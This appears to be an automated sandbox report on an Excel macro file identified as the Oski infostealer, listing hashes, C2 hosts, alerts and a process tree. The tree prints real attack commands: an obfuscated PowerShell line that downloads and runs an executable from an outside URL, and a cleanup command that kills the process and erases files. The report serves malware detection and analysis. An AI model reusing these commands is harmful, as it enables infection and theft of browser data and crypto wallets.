Analysis
-
max time kernel
101s -
max time network
100s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
05/08/2021, 18:27
Behavioral task
behavioral1
Sample
fileattached.xlsm
Resource
win7v20210410
Behavioral task
behavioral2
Sample
fileattached.xlsm
Resource
win10v20210408
General
-
Target
fileattached.xlsm
-
Size
12KB
-
MD5
2d827df1ee25674aac2060c37efa2fe7
-
SHA1
c3c6a82ee16f87ebacdd8be47018be38b6c98a27
-
SHA256
436651743894169dc9cd4c7ef01734420a5ce2d6dcaf57825197e0c756feeee9
-
SHA512
93258ac910bcad2633dfaa947edf88b3cfea5bb625b071e005fc7ba117e1307a77a6ddc5a8a7ab14a3cea646d8743dc60e5cdc0271ee8eb467faf2a06d739d66
Malware Config
Extracted
http://iurl.vip/bij0o
Extracted
oski
notedemo.axfree.com
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1716 1060 cmd.exe 24 Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 816 1060 powershell.exe 24 -
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 816 powershell.exe 9 816 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1000 zJAMC.exe -
Loads dropped DLL 8 IoCs
pid Process 1508 powershell.exe 1508 powershell.exe 1508 powershell.exe 1976 vbc.exe 1976 vbc.exe 1976 vbc.exe 1976 vbc.exe 1976 vbc.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 1716 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1000 set thread context of 1976 1000 zJAMC.exe 36 -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbc.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Kills process with taskkill 1 IoCs
pid Process 1836 taskkill.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1060 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 816 powershell.exe 1508 powershell.exe 1508 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 816 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeDebugPrivilege 1000 zJAMC.exe Token: SeDebugPrivilege 1836 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1060 EXCEL.EXE 1060 EXCEL.EXE 1060 EXCEL.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 1060 wrote to memory of 1716 1060 EXCEL.EXE 26 PID 1060 wrote to memory of 1716 1060 EXCEL.EXE 26 PID 1060 wrote to memory of 1716 1060 EXCEL.EXE 26 PID 1060 wrote to memory of 1716 1060 EXCEL.EXE 26 PID 1060 wrote to memory of 816 1060 EXCEL.EXE 28 PID 1060 wrote to memory of 816 1060 EXCEL.EXE 28 PID 1060 wrote to memory of 816 1060 EXCEL.EXE 28 PID 1060 wrote to memory of 816 1060 EXCEL.EXE 28 PID 1716 wrote to memory of 1508 1716 cmd.exe 30 PID 1716 wrote to memory of 1508 1716 cmd.exe 30 PID 1716 wrote to memory of 1508 1716 cmd.exe 30 PID 1716 wrote to memory of 1508 1716 cmd.exe 30 PID 1508 wrote to memory of 1000 1508 powershell.exe 35 PID 1508 wrote to memory of 1000 1508 powershell.exe 35 PID 1508 wrote to memory of 1000 1508 powershell.exe 35 PID 1508 wrote to memory of 1000 1508 powershell.exe 35 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1000 wrote to memory of 1976 1000 zJAMC.exe 36 PID 1976 wrote to memory of 1852 1976 vbc.exe 39 PID 1976 wrote to memory of 1852 1976 vbc.exe 39 PID 1976 wrote to memory of 1852 1976 vbc.exe 39 PID 1976 wrote to memory of 1852 1976 vbc.exe 39 PID 1852 wrote to memory of 1836 1852 cmd.exe 41 PID 1852 wrote to memory of 1836 1852 cmd.exe 41 PID 1852 wrote to memory of 1836 1852 cmd.exe 41 PID 1852 wrote to memory of 1836 1852 cmd.exe 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fileattached.xlsm1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\cmd.execmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\zJAMC.exe2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\zJAMC.exe3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 1976 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\863405627395110\\* & exit6⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 19767⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/bij0o',$env:Temp+'\zJAMC.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816
-